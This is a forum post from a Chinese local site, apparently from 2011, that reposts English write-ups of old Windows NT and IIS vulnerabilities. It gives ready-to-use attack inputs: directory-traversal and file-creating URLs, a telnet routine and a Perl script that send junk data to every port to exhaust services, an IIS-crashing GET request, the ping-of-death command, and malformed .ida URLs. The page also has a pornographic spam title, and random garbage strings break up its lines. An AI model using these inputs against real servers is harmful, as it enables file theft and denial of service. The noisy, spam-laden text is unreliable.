亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

  • <object id="nlumt"><tt id="nlumt"><pre id="nlumt"></pre></tt></object>
    <legend id="nlumt"><mark id="nlumt"></mark></legend>
    <pre id="nlumt"><tt id="nlumt"><rt id="nlumt"></rt></tt></pre>

    <bdo id="nlumt"><delect id="nlumt"></delect></bdo>

       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0  W' r- n" M& K  g
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      ! _1 G- c! O5 J
      / ^8 m9 M( h8 |( [  X# \, {" ^A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      ; d! R& i$ n7 d6 `; Z1 p; L3 _$ W5 ~
      By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.8 Y6 D3 |* q' [! y. N8 G

      ; w8 [0 l- u: F, o--------------------------------------------------------------------
      - R# z1 H& V* X6 h/ g" j  T) [* q% Z2 G0 j) }0 `4 Y/ @
      受影響系統(tǒng):4.01 J% ^2 ]& S4 J; p% [
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      ( T2 C% d0 e( V: j" J/ [! f
      ; f+ D5 v* M3 NIf the file 'target.bat' exists, the file will be truncated.. V9 P" p9 W% U# t& G' [

      1 z8 u; U3 G" q
      7 \1 H. ~4 n1 o$ j. SA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.( k0 D0 Z4 x% k- T; v

      : K# q# A) c  X6 X: \* D----------------------------------------------------------------------# N+ _9 n/ Z; O' ^  u6 r  |$ J
      / L4 l) x/ @4 {8 b: c, B
      受影響系統(tǒng):3.51,4.0
      5 U( z" d9 v  h+ q% Q5 J0 y9 Y5 K  nMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      0 I& @2 x* e+ r, V+ o6 D- A! b8 }
      The following steps;
      - c+ t- f- F- ~8 L+ l& u
      ) i5 B# O8 a8 T: g5 `( ~Telnet to an NT 4.0 system on port 135 * D$ I: `5 b% d( }$ K* H/ Z
      Type about 10 characters followed by a <CR> - S5 }" y; I9 x% Q4 D
      Exit Telnet
      3 l3 N2 s9 |4 @: G0 a! T- _4 @results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      ' i- K0 V" M2 C9 P- }, z7 n1 T, D7 |1 b! l9 D! n
      When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
      - E; l/ h5 a# O. t' `& `7 ^
      # k  P7 {' Y4 @The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
      ! ~* y$ ~6 t0 b: K# ~
      6 |8 y; y0 R& w, {# aIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
      ' x# w2 M: w$ h) ^) o& f; ^. A
      1 N1 N3 t! D9 z. R. SThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% k. X5 D: b6 c
      " Y% B8 H: ]- ~: W/ I
      /*begin poke code*/7 ]' v6 ~9 R$ P& m! E" b% w

      - M/ d, S" G' h, m( j  M7 `use Socket;# Y7 h0 s5 h! Z& K+ J. t3 D
      use FileHandle;
      1 `6 K  Q5 F* rrequire "chat2.pl";% d- a" @  Q/ X3 V; t4 P

      : O+ S% N5 ?# P$systemname = $ARGV[0] && shift;6 e! P# C- e8 t! O8 C
      - E5 ?  ~$ j# M. N1 O
      $verbose = 1; # tell me what you're hitting0 K. u5 t( I* u
      $knownports = 1; # don't hit known problem ports
      ; t3 g" h& k6 n* ^$ P1 Bfor ($port = $0; $port<65535; $port++) 4 p5 X, Q0 }8 E2 D2 `
      {
      ; u. v4 Z4 ~; A: x+ v, R' J( g, a: ]" `1 F  C1 B, V( {
      7 d0 i$ `4 e* o
      if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {% P. W) [' k  O& d4 k, M
      next;
      4 p6 J  a) t; h6 \  Y# G}1 n! L% v1 H  e
      $fh = chat::open_port($systemname, $port);
      - J2 A* p5 F' z% i, Qchat::print ($fh,"This is about ten characters or more");4 f! l  F6 t; ~! _" ~1 r- e
      if ($verbose) {- q  x! m' T) d
      print "Trying port: $port\n";
      9 V( W# z; N( _& [) Y2 C" q} 5 ]- I6 R% v5 m& f1 W$ j
      chat::close($fh);
      , N$ R  i  o- Q$ `/ B# s2 _) g$ i4 q$ ^" m# M( L0 W, m+ I# m" `" a
      }
      , O% V4 H0 E% m9 P2 r) p( S) n; q3 O& o9 D- `

      9 w! ]$ u  P% X2 s4 f/*end poke code*/
      ! }2 \2 J& |* G0 l0 x5 ?' ~& u# N' C5 m, v3 t, U/ v3 h+ q( @
      Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername5 b# R7 u  B' W; |

      ' @; P2 [( _+ B--------------------------------------------------------------------------------
      0 B) w/ Z4 _* \3 M- Q& z* ?. @" s, D: b
      受影響系統(tǒng):4.0# F% O0 b6 q  u# X  ~$ A" z
      Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.' J, s7 Q$ X$ C  D

      8 `" i7 R# A+ DThis attack causes Dr. Watson to display an alert window and to log an error: 6 f- a5 g+ P& D- @. e

      $ E9 F5 {- [, H& v  l"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 X' ~* H8 E# J

      - ]' z! H! m4 f4 j: }9 v--------------------------------------------------------------------------------6 m/ r, Y: j0 f$ J( e+ Z" T. `
      , U2 Y0 N2 @7 O1 e( r
      受影響系統(tǒng):3.51,4.0
      # W6 J& z: v5 T3 N5 L8 D' \Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:" D$ y+ A9 w2 ~+ ^( ~
      ( L$ a. E* n8 b' l: G2 _
      STOP: 0X0000001E/ |3 j& z- c( F7 y! j
      KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS2 \) u! y6 o3 S

      - K/ C, d+ [5 T' @( j" X-OR-
      4 q+ p( l" }$ @
      5 P5 z: B( s  M. _STOP: 0x0000000A
      ! e! j5 D: R: DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
      . A8 q4 H0 O1 X, A* b3 E+ ~/ u; f
      - k% ]8 W& M4 X+ U7 lNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      3 B! [% `) o" r# C6 ~" ~7 b5 B# @3 @0 n- L. N
      --------------------------------------------------------------------------------
      5 D: M' J- y, E" {) a6 V
      3 s9 H1 o2 D$ H, z: J0 ~Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ) q. p! x( z7 d2 f
      ; v1 B0 H* m& y9 s: I2 J( G8 U
      --------------------------------------------------------
      ; i8 F! p2 @+ p% D7 l) E+ u2 [2 [. {, V# z1 \" c
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

      GMT+8, 2025-7-2 22:09

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表